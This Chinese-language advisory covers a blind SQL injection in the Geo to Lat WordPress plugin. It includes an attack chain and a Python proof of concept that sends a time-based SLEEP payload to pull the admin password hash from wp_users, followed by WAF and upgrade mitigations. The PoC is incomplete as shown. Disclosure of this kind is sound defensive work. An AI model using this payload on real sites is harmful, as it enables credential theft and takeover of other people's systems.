CVE-2026-32368 WordPress Geo to Lat插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-32368

漏洞类型

SQL注入

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

delphiknight Geo to Lat WordPress Plugin <= 1.0.19

漏洞概述

CVE-2026-32368是WordPress插件Geo to Lat中的一个高危SQL注入漏洞。该插件是delphiknight开发的地理坐标转换工具，用于将地理位置转换为经纬度坐标。由于插件在处理用户输入时未对特殊字符进行适当过滤和转义，攻击者可以利用此漏洞在受影响系统中执行任意SQL命令。此漏洞属于Blind SQL注入类型，攻击者无法直接获取查询结果，但可以通过时间延迟或布尔逻辑推断来提取数据库信息。CVSS评分8.5，属于高危漏洞。虽然利用该漏洞需要低权限认证，但在多用户WordPress环境中，攻击者可能通过注册账号获取必要权限，进而利用此漏洞获取敏感数据库信息，包括用户凭证、站点配置等敏感数据。

技术细节

该漏洞存在于Geo to Lat插件的geo-to-lat功能模块中，具体是由于对用户输入的地理位置数据未进行充分的SQL转义处理。攻击者可以通过构造特殊的SQL payloads注入到插件的数据库查询语句中。由于是Blind SQL注入，攻击者通常使用以下技术手段：1) 基于时间的盲注：通过SLEEP()或BENCHMARK()函数造成时间延迟，根据响应时间判断条件真假；2) 基于布尔的盲注：通过AND 1=1或AND 1=2构造真假条件，观察页面响应差异；3) 字符串提取：使用SUBSTRING()、ASCII()等函数逐字符提取数据库内容。攻击者首先需要获取WordPress低权限账户（如订阅者角色），然后通过插件的前端接口提交恶意payload，利用SQL注入漏洞枚举数据库中的敏感信息，包括wp_users表中的用户密码哈希等。

攻击链分析

STEP 1

1

攻击者注册WordPress低权限账户（如订阅者角色）

STEP 2

2

登录后访问Geo to Lat插件管理页面获取CSRF nonce

STEP 3

3

构造Blind SQL注入payload，通过geo_to_lat_data参数注入

STEP 4

4

利用基于时间或布尔的盲注技术逐步提取数据库信息

STEP 5

5

通过SUBSTRING和ASCII函数逐字符获取wp_users表中的密码哈希

STEP 6

6

获取管理员凭证后接管整个WordPress站点

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-32368 Geo to Lat Blind SQL Injection PoC
# Target: WordPress site with Geo to Lat plugin <= 1.0.19

TARGET_URL = "http://target-site.com/wp-admin/admin-ajax.php"
WORDPRESS_USER = "attacker"
WORDPRESS_PASS = "password123"

def get_wordpress_nonce(cookie):
    """Fetch CSRF token from Geo to Lat admin page"""
    resp = requests.get(
        f"{TARGET_URL.replace('/admin-ajax.php', '')}/wp-admin/admin.php?page=geo-to-lat",
        cookies=cookie
    )
    import re
    nonce_match = re.search(r'data-nonce="([a-f0-9]+)"', resp.text)
    return nonce_match.group(1) if nonce_match else None

def blind_sql_injection_test(cookie, nonce):
    """Test blind SQL injection with time-based technique"""
    # Payload: Extract admin user password hash (first 5 chars)
    # Using CASE WHEN with SUBSTRING to extract password hash
    payload = "1' AND (SELECT CASE WHEN (SUBSTRING(user_pass,1,5)='PREFIX' THEN SLEEP(5) ELSE 0 END) FROM wp_users WHERE id=1-- -"
    
    data = {
        "action": "geo_to_lat_save_settings",
        "nonce": nonce,
        "geo_to_lat_data": payload
    }
    
    print(f"[*] Sending SQL injection payload...")
    print(f"[*] Payload: {payload}")
    
    try:
        resp = requests.post(TARGET_URL, data=data, cookies=cookie, timeout=10)
        print(f"[+] Response received")
    except requests.exceptions.Timeout:
        print(f"[!] Request timed out - SQL injection confirmed!")
        return True
    
    return False

if __name__ == "__main__":
    print("[*] CVE-2026-32368 Geo to Lat SQL Injection Tester")
    print("[*] Requires low-privilege WordPress account")

影响范围

Geo to Lat Plugin <= 1.0.19

防御指南

临时缓解措施

立即将Geo to Lat插件升级到1.0.20或更高版本；如无法立即升级，可在WAF或Web服务器层面添加SQL注入防护规则，拦截包含SLEEP()、BENCHMARK()、UNION SELECT等SQL关键字的请求；同时考虑暂时禁用Geo to Lat插件直至完成安全更新。